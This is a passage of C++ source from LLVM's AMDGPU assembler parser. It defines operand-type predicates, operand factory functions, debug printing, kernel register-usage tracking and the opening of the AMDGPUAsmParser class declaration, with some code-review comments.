return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::f16);
}
bool isSCSrcV2F16() const {
return isSCSrcF16();
}
bool isSCSrcF32() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::f32);
}
bool isSCSrcF64() const {
return isRegOrInlineNoMods(AMDGPU::SReg_64RegClassID, MVT::f64);
}
// SSrc*: scalar source operands that additionally accept literal
// immediates (and, for 32-bit, relocatable expressions).
bool isSSrcB32() const {
return isSCSrcB32() || isLiteralImm(MVT::i32) || isExpr();
}
bool isSSrcB16() const {
return isSCSrcB16() || isLiteralImm(MVT::i16);
}
// The isSSrcV2*/isSCSrcV2* packed variants below are required by the
// generated matcher but are never expected to be queried at runtime,
// hence the llvm_unreachable guards before the (dead) return statements.
bool isSSrcV2B16() const {
llvm_unreachable("cannot happen");
return isSSrcB16();
}
bool isSSrcB64() const {
// TODO: Find out how SALU supports extension of 32-bit literals to 64 bits.
// See isVSrc64().
return isSCSrcB64() || isLiteralImm(MVT::i64);
}
bool isSSrcF32() const {
return isSCSrcB32() || isLiteralImm(MVT::f32) || isExpr();
}
bool isSSrcF64() const {
return isSCSrcB64() || isLiteralImm(MVT::f64);
}
bool isSSrcF16() const {
return isSCSrcB16() || isLiteralImm(MVT::f16);
}
bool isSSrcV2F16() const {
llvm_unreachable("cannot happen");
return isSSrcF16();
}
bool isSSrcV2FP32() const {
llvm_unreachable("cannot happen");
return isSSrcF32();
}
bool isSCSrcV2FP32() const {
llvm_unreachable("cannot happen");
return isSCSrcF32();
}
bool isSSrcV2INT32() const {
llvm_unreachable("cannot happen");
return isSSrcB32();
}
bool isSCSrcV2INT32() const {
llvm_unreachable("cannot happen");
return isSCSrcB32();
}
// Accepts SGPRs or LDS-direct registers, inline constants, literals,
// or expressions.
bool isSSrcOrLdsB32() const {
return isRegOrInlineNoMods(AMDGPU::SRegOrLds_32RegClassID, MVT::i32) ||
isLiteralImm(MVT::i32) || isExpr();
}
// VCSrc*: VALU source operands drawn from the combined VGPR+SGPR (VS_*)
// register classes, also accepting inline constants but not literals.
bool isVCSrcB32() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::i32);
}
bool isVCSrcB64() const {
return isRegOrInlineNoMods(AMDGPU::VS_64RegClassID, MVT::i64);
}
bool isVCSrcB16() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::i16);
}
bool isVCSrcV2B16() const {
return isVCSrcB16();
}
bool isVCSrcF32() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::f32);
}
bool isVCSrcF64() const {
return isRegOrInlineNoMods(AMDGPU::VS_64RegClassID, MVT::f64);
}
bool isVCSrcF16() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::f16);
}
bool isVCSrcV2F16() const {
return isVCSrcF16();
}
// VSrc*: like VCSrc* but additionally accept literal immediates (and,
// for 32-bit, expressions).
// NOTE(review): delegates to the F32 variant, not isVCSrcB32 — the
// register-class check is identical; confirm the inline-constant typing
// difference is intentional.
bool isVSrcB32() const {
return isVCSrcF32() || isLiteralImm(MVT::i32) || isExpr();
}
bool isVSrcB64() const {
return isVCSrcF64() || isLiteralImm(MVT::i64);
}
bool isVSrcB16() const {
return isVCSrcB16() || isLiteralImm(MVT::i16);
}
bool isVSrcV2B16() const {
return isVSrcB16() || isLiteralImm(MVT::v2i16);
}
// Packed 2x32-bit sources occupy a 64-bit register pair.
bool isVCSrcV2FP32() const {
return isVCSrcF64();
}
bool isVSrcV2FP32() const {
return isVSrcF64() || isLiteralImm(MVT::v2f32);
}
bool isVCSrcV2INT32() const {
return isVCSrcB64();
}
bool isVSrcV2INT32() const {
return isVSrcB64() || isLiteralImm(MVT::v2i32);
}
bool isVSrcF32() const {
return isVCSrcF32() || isLiteralImm(MVT::f32) || isExpr();
}
bool isVSrcF64() const {
return isVCSrcF64() || isLiteralImm(MVT::f64);
}
bool isVSrcF16() const {
return isVCSrcF16() || isLiteralImm(MVT::f16);
}
bool isVSrcV2F16() const {
return isVSrcF16() || isLiteralImm(MVT::v2f16);
}
// VISrc*: VGPR-only source operands (plus inline constants, no literals).
// The _64/_128/_256/_512/_1024 suffix gives the register width in bits;
// the trailing type gives the element interpretation.
bool isVISrcB32() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::i32);
}
bool isVISrcB16() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::i16);
}
bool isVISrcV2B16() const {
return isVISrcB16();
}
bool isVISrcF32() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::f32);
}
bool isVISrcF16() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::f16);
}
// Packed f16 also accepts a 32-bit integer pattern (e.g. a packed
// inline value).
bool isVISrcV2F16() const {
return isVISrcF16() || isVISrcB32();
}
bool isVISrc_64B64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::i64);
}
bool isVISrc_64F64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::f64);
}
// v2f32/v2i32 in a 64-bit register pair: the inline-constant check uses
// the 32-bit element type.
bool isVISrc_64V2FP32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::f32);
}
bool isVISrc_64V2INT32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::i32);
}
bool isVISrc_256B64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::i64);
}
bool isVISrc_256F64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::f64);
}
bool isVISrc_128B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::i16);
}
bool isVISrc_128V2B16() const {
return isVISrc_128B16();
}
bool isVISrc_128B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::i32);
}
bool isVISrc_128F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::f32);
}
bool isVISrc_256V2FP32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::f32);
}
bool isVISrc_256V2INT32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::i32);
}
bool isVISrc_512B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::i32);
}
bool isVISrc_512B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::i16);
}
bool isVISrc_512V2B16() const {
return isVISrc_512B16();
}
bool isVISrc_512F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::f32);
}
bool isVISrc_512F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::f16);
}
bool isVISrc_512V2F16() const {
return isVISrc_512F16() || isVISrc_512B32();
}
bool isVISrc_1024B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::i32);
}
bool isVISrc_1024B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::i16);
}
bool isVISrc_1024V2B16() const {
return isVISrc_1024B16();
}
bool isVISrc_1024F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::f32);
}
bool isVISrc_1024F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::f16);
}
bool isVISrc_1024V2F16() const {
return isVISrc_1024F16() || isVISrc_1024B32();
}
// AISrc*: accumulator (AGPR) source operands, mirroring the VISrc*
// family above but over the AGPR/AReg register classes.
bool isAISrcB32() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::i32);
}
bool isAISrcB16() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::i16);
}
bool isAISrcV2B16() const {
return isAISrcB16();
}
bool isAISrcF32() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::f32);
}
bool isAISrcF16() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::f16);
}
bool isAISrcV2F16() const {
return isAISrcF16() || isAISrcB32();
}
bool isAISrc_64B64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_64RegClassID, MVT::i64);
}
bool isAISrc_64F64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_64RegClassID, MVT::f64);
}
bool isAISrc_128B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::i32);
}
bool isAISrc_128B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::i16);
}
bool isAISrc_128V2B16() const {
return isAISrc_128B16();
}
bool isAISrc_128F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::f32);
}
bool isAISrc_128F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::f16);
}
bool isAISrc_128V2F16() const {
return isAISrc_128F16() || isAISrc_128B32();
}
// NOTE(review): these two VISrc_128 predicates are interleaved with the
// AISrc_* group; functionally fine, but they belong with the VISrc_128
// group above.
bool isVISrc_128F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::f16);
}
bool isVISrc_128V2F16() const {
return isVISrc_128F16() || isVISrc_128B32();
}
bool isAISrc_256B64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_256RegClassID, MVT::i64);
}
bool isAISrc_256F64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_256RegClassID, MVT::f64);
}
bool isAISrc_512B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::i32);
}
bool isAISrc_512B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::i16);
}
bool isAISrc_512V2B16() const {
return isAISrc_512B16();
}
bool isAISrc_512F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::f32);
}
bool isAISrc_512F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::f16);
}
bool isAISrc_512V2F16() const {
return isAISrc_512F16() || isAISrc_512B32();
}
bool isAISrc_1024B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::i32);
}
bool isAISrc_1024B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::i16);
}
bool isAISrc_1024V2B16() const {
return isAISrc_1024B16();
}
bool isAISrc_1024F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::f32);
}
bool isAISrc_1024F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::f16);
}
bool isAISrc_1024V2F16() const {
return isAISrc_1024F16() || isAISrc_1024B32();
}
// KImm*: literal constant operands encoded directly in the instruction.
bool isKImmFP32() const {
return isLiteralImm(MVT::f32);
}
bool isKImmFP16() const {
return isLiteralImm(MVT::f16);
}
// AMDGPU asm operands are never classified as memory operands.
bool isMem() const override {
return false;
}
bool isExpr() const {
return Kind == Expression;
}
// SOPP branch targets may be either a symbolic expression or an
// immediate offset.
bool isSoppBrTarget() const {
return isExpr() || isImm();
}
// Out-of-line predicates for special operand encodings (waitcnt, hwreg,
// sendmsg, swizzle, SMRD/SMEM offsets, DPP, MAI modifiers, ...);
// definitions live elsewhere in this file.
bool isSWaitCnt() const;
bool isHwreg() const;
bool isSendMsg() const;
bool isSwizzle() const;
bool isSMRDOffset8() const;
bool isSMEMOffset() const;
bool isSMRDLiteralOffset() const;
bool isDPP8() const;
bool isDPPCtrl() const;
bool isBLGP() const;
bool isCBSZ() const;
bool isABID() const;
bool isGPRIdxMode() const;
bool isS16Imm() const;
bool isU16Imm() const;
bool isEndpgm() const;
// Returns the symbol name of an Expression operand; only valid for a
// plain MCSymbolRefExpr (the cast asserts otherwise).
StringRef getExpressionAsToken() const {
assert(isExpr());
const MCSymbolRefExpr *S = cast<MCSymbolRefExpr>(Expr);
return S->getSymbol().getName();
}
// Returns the token text. NOTE(review): isToken() presumably also
// accepts symbol-ref expressions, which is why the Expression case is
// handled here by returning the symbol's name — confirm against
// isToken()'s definition (not visible in this chunk).
StringRef getToken() const {
assert(isToken());
if (Kind == Expression)
return getExpressionAsToken();
return StringRef(Tok.Data, Tok.Length);
}
// Immediate value accessors; all assert the operand is an immediate.
int64_t getImm() const {
assert(isImm());
return Imm.Val;
}
void setImm(int64_t Val) {
assert(isImm());
Imm.Val = Val;
}
ImmTy getImmTy() const {
assert(isImm());
return Imm.Type;
}
// Register number accessor; asserts the operand is a register.
unsigned getReg() const override {
assert(isRegKind());
return Reg.RegNo;
}
SMLoc getStartLoc() const override {
return StartLoc;
}
SMLoc getEndLoc() const override {
return EndLoc;
}
SMRange getLocRange() const {
return SMRange(StartLoc, EndLoc);
}
// Source modifiers (abs/neg/sext) live on either the register or the
// immediate payload; only registers and plain (ImmTyNone) immediates
// may carry them.
Modifiers getModifiers() const {
assert(isRegKind() || isImmTy(ImmTyNone));
return isRegKind() ? Reg.Mods : Imm.Mods;
}
void setModifiers(Modifiers Mods) {
assert(isRegKind() || isImmTy(ImmTyNone));
if (isRegKind())
Reg.Mods = Mods;
else
Imm.Mods = Mods;
}
bool hasModifiers() const {
return getModifiers().hasModifiers();
}
bool hasFPModifiers() const {
return getModifiers().hasFPModifiers();
}
bool hasIntModifiers() const {
return getModifiers().hasIntModifiers();
}
// Helpers that append this parsed operand to an MCInst being built.
// The out-of-line workers are defined elsewhere in this file.
uint64_t applyInputFPModifiers(uint64_t Val, unsigned Size) const;
void addImmOperands(MCInst &Inst, unsigned N, bool ApplyModifiers = true) const;
void addLiteralImmOperand(MCInst &Inst, int64_t Val, bool ApplyModifiers) const;
template <unsigned Bitwidth>
void addKImmFPOperands(MCInst &Inst, unsigned N) const;
void addKImmFP16Operands(MCInst &Inst, unsigned N) const {
addKImmFPOperands<16>(Inst, N);
}
void addKImmFP32Operands(MCInst &Inst, unsigned N) const {
addKImmFPOperands<32>(Inst, N);
}
void addRegOperands(MCInst &Inst, unsigned N) const;
void addBoolRegOperands(MCInst &Inst, unsigned N) const {
addRegOperands(Inst, N);
}
// Dispatch on operand kind: register, expression, or immediate.
void addRegOrImmOperands(MCInst &Inst, unsigned N) const {
if (isRegKind())
addRegOperands(Inst, N);
else if (isExpr())
Inst.addOperand(MCOperand::createExpr(Expr));
else
addImmOperands(Inst, N);
}
// Emits the encoded modifier bits as an immediate operand *before* the
// value operand itself. For immediates the modifiers were already folded
// into the modifier word, so the value is added unmodified (false).
void addRegOrImmWithInputModsOperands(MCInst &Inst, unsigned N) const {
Modifiers Mods = getModifiers();
Inst.addOperand(MCOperand::createImm(Mods.getModifiersOperand()));
if (isRegKind()) {
addRegOperands(Inst, N);
} else {
addImmOperands(Inst, N, false);
}
}
// FP/Int variants only differ in which modifier family they assert
// is absent.
void addRegOrImmWithFPInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasIntModifiers());
addRegOrImmWithInputModsOperands(Inst, N);
}
void addRegOrImmWithIntInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasFPModifiers());
addRegOrImmWithInputModsOperands(Inst, N);
}
// Register-only variant: modifier word first, then the register.
void addRegWithInputModsOperands(MCInst &Inst, unsigned N) const {
Modifiers Mods = getModifiers();
Inst.addOperand(MCOperand::createImm(Mods.getModifiersOperand()));
assert(isRegKind());
addRegOperands(Inst, N);
}
void addRegWithFPInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasIntModifiers());
addRegWithInputModsOperands(Inst, N);
}
void addRegWithIntInputModsOperands(MCInst &Inst, unsigned N) const {
assert(!hasFPModifiers());
addRegWithInputModsOperands(Inst, N);
}
// Branch targets are either a resolved immediate or a relocatable
// expression.
void addSoppBrTargetOperands(MCInst &Inst, unsigned N) const {
if (isImm())
addImmOperands(Inst, N);
else {
assert(isExpr());
Inst.addOperand(MCOperand::createExpr(Expr));
}
}
// Print a human-readable name for an immediate operand type; used by
// print() when dumping operands for debugging. An unhandled enumerator
// (none exist today) would print nothing, matching the original switch.
static void printImmTy(raw_ostream& OS, ImmTy Type) {
  const char *Name = "";
  switch (Type) {
  case ImmTyNone:          Name = "None"; break;
  case ImmTyGDS:           Name = "GDS"; break;
  case ImmTyLDS:           Name = "LDS"; break;
  case ImmTyOffen:         Name = "Offen"; break;
  case ImmTyIdxen:         Name = "Idxen"; break;
  case ImmTyAddr64:        Name = "Addr64"; break;
  case ImmTyOffset:        Name = "Offset"; break;
  case ImmTyInstOffset:    Name = "InstOffset"; break;
  case ImmTyOffset0:       Name = "Offset0"; break;
  case ImmTyOffset1:       Name = "Offset1"; break;
  case ImmTyCPol:          Name = "CPol"; break;
  case ImmTySWZ:           Name = "SWZ"; break;
  case ImmTyTFE:           Name = "TFE"; break;
  case ImmTyD16:           Name = "D16"; break;
  case ImmTyFORMAT:        Name = "FORMAT"; break;
  case ImmTyClampSI:       Name = "ClampSI"; break;
  case ImmTyOModSI:        Name = "OModSI"; break;
  case ImmTyDPP8:          Name = "DPP8"; break;
  case ImmTyDppCtrl:       Name = "DppCtrl"; break;
  case ImmTyDppRowMask:    Name = "DppRowMask"; break;
  case ImmTyDppBankMask:   Name = "DppBankMask"; break;
  case ImmTyDppBoundCtrl:  Name = "DppBoundCtrl"; break;
  case ImmTyDppFi:         Name = "FI"; break;
  case ImmTySdwaDstSel:    Name = "SdwaDstSel"; break;
  case ImmTySdwaSrc0Sel:   Name = "SdwaSrc0Sel"; break;
  case ImmTySdwaSrc1Sel:   Name = "SdwaSrc1Sel"; break;
  case ImmTySdwaDstUnused: Name = "SdwaDstUnused"; break;
  case ImmTyDMask:         Name = "DMask"; break;
  case ImmTyDim:           Name = "Dim"; break;
  case ImmTyUNorm:         Name = "UNorm"; break;
  case ImmTyDA:            Name = "DA"; break;
  case ImmTyR128A16:       Name = "R128A16"; break;
  case ImmTyA16:           Name = "A16"; break;
  case ImmTyLWE:           Name = "LWE"; break;
  case ImmTyOff:           Name = "Off"; break;
  case ImmTyExpTgt:        Name = "ExpTgt"; break;
  case ImmTyExpCompr:      Name = "ExpCompr"; break;
  case ImmTyExpVM:         Name = "ExpVM"; break;
  case ImmTyHwreg:         Name = "Hwreg"; break;
  case ImmTySendMsg:       Name = "SendMsg"; break;
  case ImmTyInterpSlot:    Name = "InterpSlot"; break;
  case ImmTyInterpAttr:    Name = "InterpAttr"; break;
  case ImmTyAttrChan:      Name = "AttrChan"; break;
  case ImmTyOpSel:         Name = "OpSel"; break;
  case ImmTyOpSelHi:       Name = "OpSelHi"; break;
  case ImmTyNegLo:         Name = "NegLo"; break;
  case ImmTyNegHi:         Name = "NegHi"; break;
  case ImmTySwizzle:       Name = "Swizzle"; break;
  case ImmTyGprIdxMode:    Name = "GprIdxMode"; break;
  case ImmTyHigh:          Name = "High"; break;
  case ImmTyBLGP:          Name = "BLGP"; break;
  case ImmTyCBSZ:          Name = "CBSZ"; break;
  case ImmTyABID:          Name = "ABID"; break;
  case ImmTyEndpgm:        Name = "Endpgm"; break;
  }
  OS << Name;
}
// Debug-dump this operand in a kind-specific format.
void print(raw_ostream &OS) const override {
switch (Kind) {
case Register:
OS << "<register " << getReg() << " mods: " << Reg.Mods << '>';
break;
case Immediate:
OS << '<' << getImm();
// Only named immediate types get a "type:" annotation.
if (getImmTy() != ImmTyNone) {
OS << " type: "; printImmTy(OS, getImmTy());
}
OS << " mods: " << Imm.Mods << '>';
break;
case Token:
OS << '\'' << getToken() << '\'';
break;
case Expression:
OS << "<expr " << *Expr << '>';
break;
}
}
// Factory: create an immediate operand. Start and end locations are both
// set to Loc.
static AMDGPUOperand::Ptr CreateImm(const AMDGPUAsmParser *AsmParser,
int64_t Val, SMLoc Loc,
ImmTy Type = ImmTyNone,
bool IsFPImm = false) {
auto Op = std::make_unique<AMDGPUOperand>(Immediate, AsmParser);
Op->Imm.Val = Val;
Op->Imm.IsFPImm = IsFPImm;
Op->Imm.Kind = ImmKindTyNone;
Op->Imm.Type = Type;
Op->Imm.Mods = Modifiers();
Op->StartLoc = Loc;
Op->EndLoc = Loc;
return Op;
}
// Factory: create a token operand referencing (not copying) Str's storage,
// so Str must outlive the operand.
// NOTE(review): HasExplicitEncodingSize is accepted but unused here.
static AMDGPUOperand::Ptr CreateToken(const AMDGPUAsmParser *AsmParser,
StringRef Str, SMLoc Loc,
bool HasExplicitEncodingSize = true) {
auto Res = std::make_unique<AMDGPUOperand>(Token, AsmParser);
Res->Tok.Data = Str.data();
Res->Tok.Length = Str.size();
Res->StartLoc = Loc;
Res->EndLoc = Loc;
return Res;
}
// Factory: create a register operand with empty modifiers.
static AMDGPUOperand::Ptr CreateReg(const AMDGPUAsmParser *AsmParser,
unsigned RegNo, SMLoc S,
SMLoc E) {
auto Op = std::make_unique<AMDGPUOperand>(Register, AsmParser);
Op->Reg.RegNo = RegNo;
Op->Reg.Mods = Modifiers();
Op->StartLoc = S;
Op->EndLoc = E;
return Op;
}
// Factory: create an expression operand; both locations are set to S.
static AMDGPUOperand::Ptr CreateExpr(const AMDGPUAsmParser *AsmParser,
const class MCExpr *Expr, SMLoc S) {
auto Op = std::make_unique<AMDGPUOperand>(Expression, AsmParser);
Op->Expr = Expr;
Op->StartLoc = S;
Op->EndLoc = S;
return Op;
}
};
// Debug-print helper for operand source modifiers (abs/neg/sext flags).
raw_ostream &operator <<(raw_ostream &OS, AMDGPUOperand::Modifiers Mods) {
  OS << "abs:" << Mods.Abs;
  OS << " neg: " << Mods.Neg;
  OS << " sext:" << Mods.Sext;
  return OS;
}
//===----------------------------------------------------------------------===//
// AsmParser
//===----------------------------------------------------------------------===//
// Holds info related to the current kernel, e.g. count of SGPRs used.
// Kernel scope begins at .amdgpu_hsa_kernel directive, ends at next
// .amdgpu_hsa_kernel or at EOF.
class KernelScopeInfo {
// Highest register index seen so far, plus one; -1 means "uninitialized".
int SgprIndexUnusedMin = -1;
int VgprIndexUnusedMin = -1;
int AgprIndexUnusedMin = -1;
MCContext *Ctx = nullptr;
MCSubtargetInfo const *MSTI = nullptr;
// Record that SGPR index i is used; publishes the running maximum as the
// assembler symbol .kernel.sgpr_count.
void usesSgprAt(int i) {
if (i >= SgprIndexUnusedMin) {
SgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.sgpr_count"));
Sym->setVariableValue(MCConstantExpr::create(SgprIndexUnusedMin, *Ctx));
}
}
}
// Record that VGPR index i is used. The published .kernel.vgpr_count
// combines VGPR and AGPR usage via getTotalNumVGPRs (AGPRs alias VGPR
// budget on gfx90a-style targets).
void usesVgprAt(int i) {
if (i >= VgprIndexUnusedMin) {
VgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.vgpr_count"));
int totalVGPR = getTotalNumVGPRs(isGFX90A(*MSTI), AgprIndexUnusedMin,
VgprIndexUnusedMin);
Sym->setVariableValue(MCConstantExpr::create(totalVGPR, *Ctx));
}
}
}
// Record that AGPR index i is used; also refreshes .kernel.vgpr_count
// since it depends on the AGPR maximum.
void usesAgprAt(int i) {
// Instruction will error in AMDGPUAsmParser::MatchAndEmitInstruction
if (!hasMAIInsts(*MSTI))
return;
if (i >= AgprIndexUnusedMin) {
AgprIndexUnusedMin = ++i;
if (Ctx) {
MCSymbol* const Sym =
Ctx->getOrCreateSymbol(Twine(".kernel.agpr_count"));
Sym->setVariableValue(MCConstantExpr::create(AgprIndexUnusedMin, *Ctx));
// Also update vgpr_count (dependent on agpr_count for gfx908/gfx90a)
MCSymbol* const vSym =
Ctx->getOrCreateSymbol(Twine(".kernel.vgpr_count"));
int totalVGPR = getTotalNumVGPRs(isGFX90A(*MSTI), AgprIndexUnusedMin,
VgprIndexUnusedMin);
vSym->setVariableValue(MCConstantExpr::create(totalVGPR, *Ctx));
}
}
}
public:
KernelScopeInfo() = default;
// Reset the counters for a new kernel scope; the usesXgprAt(-1) calls
// publish the *_count symbols with an initial value of zero.
void initialize(MCContext &Context) {
Ctx = &Context;
MSTI = Ctx->getSubtargetInfo();
usesSgprAt(SgprIndexUnusedMin = -1);
usesVgprAt(VgprIndexUnusedMin = -1);
if (hasMAIInsts(*MSTI)) {
usesAgprAt(AgprIndexUnusedMin = -1);
}
}
// Note a use of RegWidth consecutive dword registers starting at
// DwordRegIndex.
void usesRegister(RegisterKind RegKind, unsigned DwordRegIndex, unsigned RegWidth) {
switch (RegKind) {
case IS_SGPR: usesSgprAt(DwordRegIndex + RegWidth - 1); break;
case IS_AGPR: usesAgprAt(DwordRegIndex + RegWidth - 1); break;
case IS_VGPR: usesVgprAt(DwordRegIndex + RegWidth - 1); break;
default: break;
}
}
};
class AMDGPUAsmParser : public MCTargetAsmParser {
MCAsmParser &Parser;
// Number of extra operands parsed after the first optional operand.
// This may be necessary to skip hardcoded mandatory operands.
static const unsigned MAX_OPR_LOOKAHEAD = 8;
// Encoding forced via mnemonic suffix (_e32/_e64/_dpp/_sdwa); 0 = none.
unsigned ForcedEncodingSize = 0;
bool ForcedDPP = false;
bool ForcedSDWA = false;
KernelScopeInfo KernelScope;
// Bitmask of cache-policy modifiers already seen on the current
// instruction, used to reject duplicates.
unsigned CPolSeen;
/// @name Auto-generated Match Functions
/// {
#define GET_ASSEMBLER_HEADER
#include "AMDGPUGenAsmMatcher.inc"
/// }
private:
bool ParseAsAbsoluteExpression(uint32_t &Ret);
bool OutOfRangeError(SMRange Range);
/// Calculate VGPR/SGPR blocks required for given target, reserved
/// registers, and user-specified NextFreeXGPR values.
///
/// \param Features [in] Target features, used for bug corrections.
/// \param VCCUsed [in] Whether VCC special SGPR is reserved.
/// \param FlatScrUsed [in] Whether FLAT_SCRATCH special SGPR is reserved.
/// \param XNACKUsed [in] Whether XNACK_MASK special SGPR is reserved.
/// \param EnableWavefrontSize32 [in] Value of ENABLE_WAVEFRONT_SIZE32 kernel
/// descriptor field, if valid.
/// \param NextFreeVGPR [in] Max VGPR number referenced, plus one.
/// \param VGPRRange [in] Token range, used for VGPR diagnostics.
/// \param NextFreeSGPR [in] Max SGPR number referenced, plus one.
/// \param SGPRRange [in] Token range, used for SGPR diagnostics.
/// \param VGPRBlocks [out] Result VGPR block count.
/// \param SGPRBlocks [out] Result SGPR block count.
bool calculateGPRBlocks(const FeatureBitset &Features, bool VCCUsed,
bool FlatScrUsed, bool XNACKUsed,
Optional<bool> EnableWavefrontSize32, unsigned NextFreeVGPR,
SMRange VGPRRange, unsigned NextFreeSGPR,
SMRange SGPRRange, unsigned &VGPRBlocks,
unsigned &SGPRBlocks);
// Assembler-directive handlers (.amdgcn_target, .amdhsa_kernel, ...).
bool ParseDirectiveAMDGCNTarget();
bool ParseDirectiveAMDHSAKernel();
bool ParseDirectiveMajorMinor(uint32_t &Major, uint32_t &Minor);
bool ParseDirectiveHSACodeObjectVersion();
bool ParseDirectiveHSACodeObjectISA();
bool ParseAMDKernelCodeTValue(StringRef ID, amd_kernel_code_t &Header);
bool ParseDirectiveAMDKernelCodeT();
// TODO: Possibly make subtargetHasRegister const.
bool subtargetHasRegister(const MCRegisterInfo &MRI, unsigned RegNo);
bool ParseDirectiveAMDGPUHsaKernel();
bool ParseDirectiveISAVersion();
bool ParseDirectiveHSAMetadata();
bool ParseDirectivePALMetadataBegin();
bool ParseDirectivePALMetadata();
bool ParseDirectiveAMDGPULDS();
/// Common code to parse out a block of text (typically YAML) between start and
/// end directives.
bool ParseToEndDirective(const char *AssemblerDirectiveBegin,
const char *AssemblerDirectiveEnd,
std::string &CollectString);
// Register-parsing helpers.
bool AddNextRegisterToList(unsigned& Reg, unsigned& RegWidth,
RegisterKind RegKind, unsigned Reg1, SMLoc Loc);
bool ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
bool RestoreOnFailure = false);
bool ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseRegularReg(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseSpecialReg(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens);
unsigned ParseRegList(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth, SmallVectorImpl<AsmToken> &Tokens);
bool ParseRegRange(unsigned& Num, unsigned& Width);
unsigned getRegularReg(RegisterKind RegKind,
unsigned RegNum,
unsigned RegWidth,
SMLoc Loc);
bool isRegister();
bool isRegister(const AsmToken &Token, const AsmToken &NextToken) const;
// GPR-count symbol bookkeeping (.amdgcn.next_free_{v,s}gpr style).
Optional<StringRef> getGprCountSymbolName(RegisterKind RegKind);
void initializeGprCountSymbol(RegisterKind RegKind);
bool updateGprCountSymbols(RegisterKind RegKind, unsigned DwordRegIndex,
unsigned RegWidth);
// Shared MCInst-building code for MUBUF and DS instruction families.
void cvtMubufImpl(MCInst &Inst, const OperandVector &Operands,
bool IsAtomic, bool IsLds = false);
void cvtDSImpl(MCInst &Inst, const OperandVector &Operands,
bool IsGdsHardcoded);
public:
enum AMDGPUMatchResultTy {
Match_PreferE32 = FIRST_TARGET_MATCH_RESULT_TY
};
enum OperandMode {
OperandMode_Default,
OperandMode_NSA,
};
using OptionalImmIndexMap = std::map<AMDGPUOperand::ImmTy, unsigned>;
// Constructor: selects default features when none are set, then publishes
// the ISA version as pre-defined assembler symbols and initializes GPR
// counting (symbol-based for HSA ABI v3+, KernelScope otherwise).
